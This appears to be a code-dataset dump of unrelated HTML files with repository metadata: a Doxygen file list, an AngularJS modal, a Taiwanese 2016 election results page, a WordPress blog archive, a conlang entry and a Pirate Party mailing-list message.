href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Search" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li class="current"><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>File&#160;Members</span></a></li> </ul> </div> </div><!-- top --> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Variables</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div class="header"> <div class="headertitle"> <div class="title">File List</div> </div> </div><!--header--> <div class="contents"> <div class="textblock">Here is a list of all documented files with brief descriptions:</div><div class="directory"> <table class="directory"> <tr id="row_0_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="face_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><b>face.h</b></td><td class="desc"></td></tr> <tr id="row_1_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="light_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><a class="el" href="light_8h.html" target="_self">light.h</a></td><td class="desc">A simple <a class="el" href="classLight.html">Light</a> class to facilitate light control in the scene </td></tr> <tr id="row_2_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><img src="ftv2doc.png" alt="*" width="24" height="22" /><a class="el" href="main_8cpp.html" target="_self">main.cpp</a></td><td class="desc">Summer 2015 Assignment #2 </td></tr> <tr id="row_3_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="material_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><b>material.h</b></td><td class="desc"></td></tr> <tr id="row_4_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="meshmodel_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><a class="el" href="meshmodel_8h.html" target="_self">meshmodel.h</a></td><td class="desc">Base class for all mesh models for which we will read data from files </td></tr> <tr id="row_5_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="model_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><a class="el" href="model_8h.html" target="_self">model.h</a></td><td class="desc">Base class for all models </td></tr> <tr id="row_6_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="normal_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><b>normal.h</b></td><td class="desc"></td></tr> <tr id="row_7_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="object_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><b>object.h</b></td><td class="desc"></td></tr> <tr id="row_8_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="objmodel_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><a class="el" href="objmodel_8h.html" target="_self">objmodel.h</a></td><td class="desc">Class that handles models described in .obj files </td></tr> <tr id="row_9_"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="teapot_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><a class="el" href="teapot_8h.html" target="_self">teapot.h</a></td><td class="desc">Simple example of a subclass created from <a class="el" href="classModel.html">Model</a> class </td></tr> <tr id="row_10_" class="even"><td class="entry"><img src="ftv2node.png" alt="o" width="16" height="22" /><a href="turntable_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><a class="el" href="turntable_8h.html" target="_self">turntable.h</a></td><td class="desc">A simple extention of <a class="el" href="classModel.html">Model</a> class to create a circular turntable on which the models will be placed </td></tr> <tr id="row_11_"><td class="entry"><img src="ftv2lastnode.png" alt="\" width="16" height="22" /><a href="vertex_8h_source.html"><img src="ftv2doc.png" alt="*" width="24" height="22" /></a><b>vertex.h</b></td><td class="desc"></td></tr> </table> </div><!-- directory --> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Tue Jul 7 2015 22:51:36 for My Project by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.6 </small></address> </body> </html>
kmhasan-class/summer2015cg
Summer 2015 A2/html/files.html
HTML
cc0-1.0
8,137
<!DOCTYPE html> <div class="ngdialog-message ngdialog-sm" md-theme="modal"> <md-toolbar class="md-accent"> <div class="md-toolbar-tools"> <h3 class="modal-title" style="width: 100%; text-align: center;"> ACEPTAR TRANSFERENCIA </h3> </div> </md-toolbar> <md-content flex> <md-content class="md-padding" flex> <md-whiteframe class="md-whiteframe-24dp" style="min-height: 250px;" layout layout-align="center center"> <form style="text-align: center;"> <div flex class="md-padding"> <span style="font-size: medium;">¿Estas seguro de que quieres continuar?</span> </div> <div flex class="md-padding"> <button class="btn btn-md btn-success" style="width: 50px;" ng-click="confirmarAceptarTransferencia()">Si</button> <button class="btn btn-md btn-danger" style="width: 50px;" ng-click="closeThisDialog(0)">No</button> </div> </form> </md-whiteframe> </md-content> </md-content> </div>
CosmicaJujuy/TierraDesktop
views/transferencia/modal-aceptar-transferencia.html
HTML
cc0-1.0
1,338
<!DOCTYPE html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <title>105年第十四任總統副總統及第九屆立法委員選舉</title> <link href="../css/style.css" rel="stylesheet" type="text/css"> <link href="../css/style2.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="../js/ftiens4.js"></script> <script type="text/javascript" src="../js/ua.js"></script> <script type="text/javascript" src="../js/func.js"></script> <script type="text/javascript" src="../js/treeP1.js"></script> <script type="text/javascript" src="../js/refresh.js"></script> </head> <body id="main-body"> <div id="main-header"> <div id="main-top"> <a class="main-top-logo" href="#">中央選舉委員會</a> <ul class="main-top-list"> <li class="main-top-item"><a class="main-top-link main-top-link-home" href="../index.html">回首頁</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-cec" href="http://2016.cec.gov.tw">中選會網站</a></li> <li class="main-top-item"><a class="main-top-link main-top-link-english" href="../../en/index.html">English</a></li> </ul> </div> </div> <div id="main-wrap"> <div id="main-banner"> <div class="slideshow"> <img src="../img/main_bg_1.jpg" width="1024" height="300" alt="background" title="background"> </div> <div class="main-deco"></div> <div class="main-title"></div> <a class="main-pvpe main-pvpe-current" href="../IDX/indexP1.html">總統副總統選舉</a> <a class="main-le" href="../IDX/indexT.html">立法委員選舉</a> </div> <div id="main-container"> <div id="main-content"> <table width="1024" border="1" cellpadding="0" cellspacing="0"> <tr> <td width="180" valign="top"> <div id="divMenu"> <table border="0"> <tr> <td><a style="text-decoration:none;color:silver" href="http://www.treemenu.net/" target=_blank></a></td> </tr> </table> <span class="TreeviewSpanArea"> <script>initializeDocument()</script> <noscript>請開啟Javascript功能</noscript> </span> </div> </td> <td width="796" valign="top"> <div id="divContent"> <!-- 修改區塊 --> <table width="100%" border="0" cellpadding="0" cellspacing="4"> <tr> <td><img src="../images/search.png" alt="候選人得票數" title="候選人得票數">&nbsp;<b>總統副總統選舉&nbsp;候選人在 嘉義縣 太保市得票數&nbsp;</b></td> </tr> <tr valign="bottom"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr valign="bottom"> <td class="fontNumber">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;<img src="../images/nav.gif" alt="候選組數" title="候選組數">&nbsp;候選組數:3&nbsp;&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;<img src="../images/nav.gif" alt="應選組數" title="應選組數">&nbsp;應選組數:1</td> <td align="right"> <select name="selector_order" class="selectC" tabindex="1" id="orderBy" onChange="changeOrder();"> <option value="n">依號次排序</option> <option value="s">依得票排序</option> </select> </td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="6" cellspacing="1" class="tableT"> <tr class="trHeaderT"> <td>註記</td> <td>號次</td> <td><table><tr><td>總統</td><td rowspan=2> 候選人姓名</td></tr><td>副總統</td></table></td> <td>性別</td> <td>得票數</td> <td>得票率%</td> <td>登記方式</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>1</td> <td>朱立倫<br>王如玄</td> <td>男<br>女</td> <td class="tdAlignRight">3,726</td> <td class="tdAlignRight">22.7334</td> <td>中國國民黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>2</td> <td>蔡英文<br>陳建仁</td> <td>女<br>男</td> <td class="tdAlignRight">10,666</td> <td class="tdAlignRight">65.0763</td> <td>民主進步黨&nbsp; 推薦</td> </tr> <tr class="trT"> <td>&nbsp;</td> <td>3</td> <td>宋楚瑜<br>徐欣瑩</td> <td>男<br>女</td> <td class="tdAlignRight">1,998</td> <td class="tdAlignRight">12.1904</td> <td>親民黨&nbsp; 推薦</td> </tr> <tr class="trFooterT"> <td colspan="7" align="right">投開票所數 已送/應送:&nbsp;26/29&nbsp;</td> </tr> </table> </td> </tr> <tr valign="top"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="10"></td> <td valign="top" class="fontNote"> <table> <tr> <td>註記說明:</td> <td align="center">◎</td> <td>自然當選</td> </tr> <tr> <td></td> <td align="center">?</td> <td>同票待抽籤</td> </tr> </table> </td> <td valign="top" class="fontTimer"><img src="../images/clock2.png" alt="Sat, 16 Jan 2016 19:36:12 +0800" title="Sat, 16 Jan 2016 19:36:12 +0800">&nbsp;資料更新時間:&nbsp;01/16&nbsp;19:36:06&nbsp;<br>(網頁每3分鐘自動更新一次)</td> </tr> <tr> <td colspan="3" class="fontNote"></td> </tr> </table> </td> </tr> </table> <!-- 修改區塊 --> </div> </td> </tr> </table> </div> <div class="main-footer"></div> <div id="divFooter" align=center>[中央選舉委員會] </div> <!--main-content--> </div><!--main-container--> </div><!--END main-wrap--> <script>setOrder();</script> <script>setMenuScrollPosY();</script> </body> </html>
gugod/vote-watch-2016
data/president/n706000400000000/20160116113757/page.html
HTML
cc0-1.0
6,578
<!DOCTYPE html> <!--[if IE 7]> <html class="ie ie7" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="ie ie8" lang="en-US"> <![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>09 | January | 2009 | mind the explanatory gap</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <!--[if lt IE 9]> <script src="http://explanatorygap.net/wp-content/themes/twentythirteen/js/html5.js"></script> <![endif]--> <link rel="alternate" type="application/rss+xml" title="mind the explanatory gap &raquo; Feed" href="http://explanatorygap.net/wp-content/plugins/really-static/static/feed/" /> <link rel='stylesheet' id='wpcf-css' href='http://explanatorygap.net/wp-content/plugins/wp-contact-form/wpcf.css?ver=20110218' type='text/css' media='all' /> <link rel='stylesheet' id='twentythirteen-fonts-css' href='//fonts.googleapis.com/css?family=Source+Sans+Pro%3A300%2C400%2C700%2C300italic%2C400italic%2C700italic%7CBitter%3A400%2C700&#038;subset=latin%2Clatin-ext' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-css' href='http://explanatorygap.net/wp-content/themes/twentythirteen/fonts/genericons.css?ver=2.09' type='text/css' media='all' /> <link rel='stylesheet' id='twentythirteen-style-css' href='http://explanatorygap.net/wp-content/themes/twentythirteen/style.css?ver=2013-07-18' type='text/css' media='all' /> <!--[if lt IE 9]> <link rel='stylesheet' id='twentythirteen-ie-css' href='http://explanatorygap.net/wp-content/themes/twentythirteen/css/ie.css?ver=2013-07-18' type='text/css' media='all' /> <![endif]--> <script type='text/javascript' src='http://explanatorygap.net/wp-includes/js/jquery/jquery.js?ver=1.11.0'></script> <script type='text/javascript' src='http://explanatorygap.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script> <script type='text/javascript' src='http://explanatorygap.net/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.4.7.3'></script> <meta name="generator" content="WordPress 3.9.1 - really-static 0.5" /> <link rel="stylesheet" href="http://explanatorygap.net/wp-content/plugins/source-code-syntax-highlighting-plugin-for-wordpress/geshi.css" type="text/css" /> <style type="text/css" id="twentythirteen-header-css"> .site-header { background: url(http://explanatorygap.net/wp-content/themes/twentythirteen/images/headers/star.png) no-repeat scroll top; background-size: 1600px auto; } </style> <!-- Google Analytics Tracking by Google Analyticator 6.4.7.3: http://www.videousermanuals.com/google-analyticator/ --> <script type="text/javascript"> var analyticsFileTypes = ['']; var analyticsSnippet = 'enabled'; var analyticsEventTracking = 'enabled'; </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-719433-1']); _gaq.push(['_addDevId', 'i9k95']); // Google Analyticator App ID with Google _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </head> <body class="archive date single-author"> <div id="page" class="hfeed site"> <header id="masthead" class="site-header" role="banner"> <a class="home-link" href="http://explanatorygap.net/wp-content/plugins/really-static/static/" title="mind the explanatory gap" rel="home"> <h1 class="site-title">mind the explanatory gap</h1> <h2 class="site-description">many a slip &#039;twixt mind and lip&#8230;</h2> </a> <div id="navbar" class="navbar"> <nav id="site-navigation" class="navigation main-navigation" role="navigation"> <h3 class="menu-toggle">Menu</h3> <a class="screen-reader-text skip-link" href="#content" title="Skip to content">Skip to content</a> <div class="nav-menu"><ul><li class="page_item page-item-2"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/about/">About/Contact</a></li><li class="page_item page-item-278"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/os-x-puppet-pkgs/">OS X Puppet pkgs</a></li></ul></div> <form role="search" method="get" class="search-form" action="http://explanatorygap.net/wp-content/plugins/really-static/static/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </label> <input type="submit" class="search-submit" value="Search" /> </form> </nav><!-- #site-navigation --> </div><!-- #navbar --> </header><!-- #masthead --> <div id="main" class="site-main"> <div id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <header class="archive-header"> <h1 class="archive-title">Daily Archives: January 9, 2009</h1> </header><!-- .archive-header --> <article id="post-174" class="post-174 post type-post status-publish format-standard hentry category-macosxserver"> <header class="entry-header"> <h1 class="entry-title"> <a href="http://explanatorygap.net/wp-content/plugins/really-static/static/2009/01/09/macworld-2009-puppet-on-mac-os-x/" rel="bookmark">Macworld 2009: Puppet on Mac OS X</a> </h1> <div class="entry-meta"> <span class="date"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/2009/01/09/macworld-2009-puppet-on-mac-os-x/" title="Permalink to Macworld 2009: Puppet on Mac OS X" rel="bookmark"><time class="entry-date" datetime="2009-01-09T11:39:23+00:00">January 9, 2009</time></a></span><span class="categories-links"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/macosxserver/" title="View all posts in macosxserver" rel="category tag">macosxserver</a></span><span class="author vcard"><a class="url fn n" href="http://explanatorygap.net/wp-content/plugins/really-static/static/author/nigelkersten/" title="View all posts by nigel kersten" rel="author">nigel kersten</a></span> </div><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> <p><iframe src='http://docs.google.com/EmbedSlideshow?docid=dg382zb7_1cd4bwhg9' frameborder='0' width='410' height='342'></iframe></p> </div><!-- .entry-content --> <footer class="entry-meta"> <div class="comments-link"> <a href="http://explanatorygap.net/wp-content/plugins/really-static/static/2009/01/09/macworld-2009-puppet-on-mac-os-x/#comments" title="Comment on Macworld 2009: Puppet on Mac OS X">View all 2 comments</a> </div><!-- .comments-link --> </footer><!-- .entry-meta --> </article><!-- #post --> <article id="post-172" class="post-172 post type-post status-publish format-standard hentry category-macosxserver"> <header class="entry-header"> <h1 class="entry-title"> <a href="http://explanatorygap.net/wp-content/plugins/really-static/static/2009/01/09/macworld-2009-python-for-system-administration/" rel="bookmark">Macworld 2009: Python for System Administration</a> </h1> <div class="entry-meta"> <span class="date"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/2009/01/09/macworld-2009-python-for-system-administration/" title="Permalink to Macworld 2009: Python for System Administration" rel="bookmark"><time class="entry-date" datetime="2009-01-09T11:38:30+00:00">January 9, 2009</time></a></span><span class="categories-links"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/macosxserver/" title="View all posts in macosxserver" rel="category tag">macosxserver</a></span><span class="author vcard"><a class="url fn n" href="http://explanatorygap.net/wp-content/plugins/really-static/static/author/nigelkersten/" title="View all posts by nigel kersten" rel="author">nigel kersten</a></span> </div><!-- .entry-meta --> </header><!-- .entry-header --> <div class="entry-content"> <p>Presentation here:</p> <p><iframe src='http://docs.google.com/EmbedSlideshow?docid=dg382zb7_24hmmztnf5' frameborder='0' width='410' height='342'></iframe></p> </div><!-- .entry-content --> <footer class="entry-meta"> <div class="comments-link"> <a href="http://explanatorygap.net/wp-content/plugins/really-static/static/2009/01/09/macworld-2009-python-for-system-administration/#comments" title="Comment on Macworld 2009: Python for System Administration">View all 4 comments</a> </div><!-- .comments-link --> </footer><!-- .entry-meta --> </article><!-- #post --> </div><!-- #content --> </div><!-- #primary --> </div><!-- #main --> <footer id="colophon" class="site-footer" role="contentinfo"> <div id="secondary" class="sidebar-container" role="complementary"> <div class="widget-area"> <aside id="pages-2" class="widget widget_pages"><h3 class="widget-title">Pages</h3> <ul> <li class="page_item page-item-2"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/about/">About/Contact</a></li> <li class="page_item page-item-278"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/os-x-puppet-pkgs/">OS X Puppet pkgs</a></li> </ul> </aside><aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action="http://explanatorygap.net/wp-content/plugins/really-static/static/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></aside><aside id="tweetbox" class="widget tweetbox_widget"><h3 class="widget-title">Latest Tweets</h3><script type="text/javascript" src="http://explanatorygap.net/wp-content/plugins/tweetbox/tweetbox.js"></script><script>getTweets('nigelkersten', 3, '')</script><div id="tweetboxtweets">Fetching latest tweets...</div></aside><aside id="categories-1" class="widget widget_categories"><h3 class="widget-title">Categories</h3> <ul> <li class="cat-item cat-item-5"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/nix/" title="View all posts filed under *nix">*nix</a> </li> <li class="cat-item cat-item-6"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/macosx/" title="View all posts filed under macosx">macosx</a> </li> <li class="cat-item cat-item-3"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/macosxserver/" title="View all posts filed under macosxserver">macosxserver</a> </li> <li class="cat-item cat-item-13"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/puppet/" title="View all posts filed under puppet">puppet</a> </li> <li class="cat-item cat-item-15"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/python/" title="View all posts filed under python">python</a> </li> <li class="cat-item cat-item-4"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/ramblings/" title="View all posts filed under ramblings">ramblings</a> </li> <li class="cat-item cat-item-2"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/snippets/" title="Snippets">Snippets</a> </li> <li class="cat-item cat-item-7"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/software-and-scripts/" title="View all posts filed under software and scripts">software and scripts</a> </li> <li class="cat-item cat-item-1"><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/category/uncategorized/" title="View all posts filed under Uncategorized">Uncategorized</a> </li> </ul> </aside><aside id="meta-2" class="widget widget_meta"><h3 class="widget-title">Meta</h3> <ul> <li><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/wp-login.php">Log in</a></li> <li><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/feed/" title="Syndicate this site using RSS 2.0">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="http://explanatorygap.net/wp-content/plugins/really-static/static/comments/feed/" title="The latest comments to all posts in RSS">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://wordpress.org/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a></li> </ul> </aside><aside id="linkcat-10" class="widget widget_links"><h3 class="widget-title">Mac Dev Blogs</h3> <ul class='xoxo blogroll'> <li><a href="http://ridiculousfish.com/blog/">Ridiculous Fish</a></li> <li><a href="http://www.theocacao.com/" title="Scott Stevenson&#8217;s blog">theocacao.com</a></li> </ul> </aside> <aside id="linkcat-8" class="widget widget_links"><h3 class="widget-title">Mac Tech Blogs</h3> <ul class='xoxo blogroll'> <li><a href="http://bynkii.com/" title="John C. Welch&#8217;s blog&#8230; the reason God invented the middle finger&#8230;">bynkii.com</a></li> <li><a href="http://arstechnica.com/staff/fatbits.ars" title="John Siracusa&#8217;s Journal">fatbits</a></li> <li><a href="http://iamleeg.blogspot.com/" title="Graham Lee&#8217;s blog&#8230; lots of Darwin and Openstep.">i am leeg</a></li> <li><a href="http://managingosx.wordpress.com/" title="Greg Neagle&#8217;s Managing OS X blog">managing os x</a></li> <li><a href="http://northstarlabs.net" title="Jeff McCune&#8217;s sysadmin blog">northstarlabs.net</a></li> <li><a href="http://www.radiotope.com/writing/" title="Edward Marczak&#8217;s blog&#8230; the oneness of tech..">tech zendo</a></li> <li><a href="http://www.dreness.com/blog/" title="Andre&#8217;s Mac geek blog&#8230;">the bits</a></li> <li><a href="http://yourmacguy.wordpress.com/" title="Peter Bukowinski&#8217;s blog">Your Mac Guy</a></li> </ul> </aside> <aside id="linkcat-9" class="widget widget_links"><h3 class="widget-title">Mac Technical Sites</h3> <ul class='xoxo blogroll'> <li><a href="http://www.afp548.com" title="We put the M in RTFM&#8230;">AFP548.com</a></li> <li><a href="http://www.macenterprise.org" title="The MacEnterprise project is a community of IT professionals sharing information and solutions to support Macs in an enterprise.">MacEnterprise.org</a></li> <li><a href="http://xsanity.com/">xsanity</a></li> </ul> </aside> <aside id="linkcat-12" class="widget widget_links"><h3 class="widget-title">Social</h3> <ul class='xoxo blogroll'> <li><a href="http://yumamino.com/" title="Tane Potaka&#8217;s blog">Yumamino</a></li> </ul> </aside> </div><!-- .widget-area --> </div><!-- #secondary --> <div class="site-info"> <a href="http://wordpress.org/" title="Semantic Personal Publishing Platform">Proudly powered by WordPress</a> </div><!-- .site-info --> </footer><!-- #colophon --> </div><!-- #page --> <script type='text/javascript' src='http://explanatorygap.net/wp-includes/js/masonry.min.js?ver=3.1.2'></script> <script type='text/javascript' src='http://explanatorygap.net/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2'></script> <script type='text/javascript' src='http://explanatorygap.net/wp-content/themes/twentythirteen/js/functions.js?ver=2013-07-18'></script> </body> </html> <!-- Dynamic Page Served (once) in 0.265 seconds -->
nigelkersten/nigelkersten.github.io
oldblog/2009/01/09/index.html
HTML
cc0-1.0
15,865
<!DOCTYPE html> <html lang="en"> <meta charset="utf-8"> <title>-wei</title> <link type="text/css" rel="stylesheet" href="../../style.css"> <h1 lang="art-Latn-x-osv-0010"> -wei </h1> <dl> <dt>Etymology: <dd>From VIV <i lang="art-Latn-x-osv-0009">*-auei</i> <small>«do»</small>. </dl> <h2>affix</h2> <aside>positive: <i lang="art-Latn-x-osv-0010">-wai</i></aside> <p> perfective aspect
literallybenjam/langdev
data/languages/jsv/osv/0010/block001/-wei.html
HTML
cc0-1.0
398
<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Re: [Partido Pirata] Res: Reunião do Partido Pirat a</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="apple-touch-icon" sizes="114x114" href="https://www.mail-archive.com/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://www.mail-archive.com/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="57x57" href="https://www.mail-archive.com/apple-touch-icon-57x57.png"> <link rel="shortcut icon" href="https://www.mail-archive.com/favicon.ico"> <link rel="contents" href="https://www.mail-archive.com/listapirata@listas.partidopirata.org/thrd2.html#00751" id="c"> <link rel="index" href="https://www.mail-archive.com/listapirata@listas.partidopirata.org/maillist.html#00751" id="i"> <link rel="prev" href="msg00750.html" id="p"> <link rel="next" href="msg00752.html" id="n"> <link rel="alternate" title="listapirata RSS" href="msg00751.html#" type="application/rss+xml"> <link rel="canonical" href="msg00751.html"> <link rel="stylesheet" href="https://www.mail-archive.com/normalize.css" media="screen"> <link rel="stylesheet" href="https://www.mail-archive.com/master.css" media="screen"> <!--[if lt IE 9]> <link rel="stylesheet" href="/ie.css" media="screen"> <![endif]--> </head> <body> <script language="javascript" type="text/javascript"> document.onkeydown = NavigateThrough; function NavigateThrough (event) { if (!document.getElementById) return; if (window.event) event = window.event; if (event.target.tagName == 'INPUT') return; var link = null; switch (event.keyCode ? event.keyCode : event.which ? event.which : null) { case 74: case 80: link = document.getElementById ('p'); break; case 75: case 78: link = document.getElementById ('n'); break; case 73: link = document.getElementById ('i'); break; case 67: link = document.getElementById ('c'); break; case 69: link = document.getElementById ('e'); break; } if (link && link.href) document.location = link.href; } </script> <div itemscope itemtype="http://schema.org/Article" class="container"> <div class="skipLink"> <a href="msg00751.html#nav">Skip to site navigation (Press enter)</a> </div> <div class="content" role="main"> <div class="msgHead"> <h1> <span class="subject"><a href="https://www.mail-archive.com/search?l=listapirata@listas.partidopirata.org&amp;q=subject:%22Re%5C%3A+%5C%5BPartido+Pirata%5C%5D%09Res%5C%3A+Reuni%C3%A3o+do+Partido+Pirat%09a%22&amp;o=newest" rel="nofollow"><span itemprop="name">Re: [Partido Pirata] Res: Reunião do Partido Pirat a</span></a></span> </h1> <p class="darkgray font13"> <span class="sender pipe"><a href="https://www.mail-archive.com/search?l=listapirata@listas.partidopirata.org&amp;q=from:%22Igor+Thiago%22" rel="nofollow"><span itemprop="author" itemscope itemtype="http://schema.org/Person"><span itemprop="name">Igor Thiago</span></span></a></span> <span class="date"><a href="https://www.mail-archive.com/search?l=listapirata@listas.partidopirata.org&amp;q=date:20101229" rel="nofollow"><span itemprop="datePublished" content="2010-12-29T10:05:10-0800">Wed, 29 Dec 2010 10:05:10 -0800</span></a></span> </p> </div> <div itemprop="articleBody" class="msgBody"> <!--X-Body-of-Message--> <pre>&quot;Se for começar com baixaria, vou pedir pra todo mundo vestir a roupa e ir embora!&quot;</pre><pre> AHEUHAUHeAUhuaheuahuHAUHEuAHEUHAUEHuahuHAUEHeahuahuhUAHeuHAue -- Igor Thiago Vulcão da Silva Bach. em Ciência da Computação *Programador Java WEB Designer* Contato: (91) 8120-1949 E-mail: vulcaodevelo...@gmail.com MSN: thiagortven...@hotmail.com </pre><pre>_______________________________________________ Lista de discussão do Partido Pirata listapirata@listas.partidopirata.org <a rel="nofollow" href="http://listas.partidopirata.org/cgi-bin/mailman/listinfo/listapirata">http://listas.partidopirata.org/cgi-bin/mailman/listinfo/listapirata</a> <a rel="nofollow" href="http://listas.partidopirata.org/cgi-bin/mailman/listinfo">http://listas.partidopirata.org/cgi-bin/mailman/listinfo</a></pre> </div> <div class="msgButtons margintopdouble"> <ul class="overflow"> <li class="msgButtonItems"><a class="button buttonleft " accesskey="p" href="msg00750.html">Mensagem anterior</a></li> <li class="msgButtonItems textaligncenter"><a class="button" accesskey="c" href="https://www.mail-archive.com/listapirata@listas.partidopirata.org/thrd2.html#00751">Exibir por discuss&#0227;o</a></li> <li class="msgButtonItems textaligncenter"><a class="button" accesskey="i" href="https://www.mail-archive.com/listapirata@listas.partidopirata.org/maillist.html#00751">Exibir por data</a></li> <li class="msgButtonItems textalignright"><a class="button buttonright " accesskey="n" href="msg00752.html">Pr&#0243;xima mensagem</a></li> </ul> </div> <a name="tslice"></a> <div class="tSliceList margintopdouble"> <ul class="icons monospace"> <li class="icons-email"><span class="subject"><a 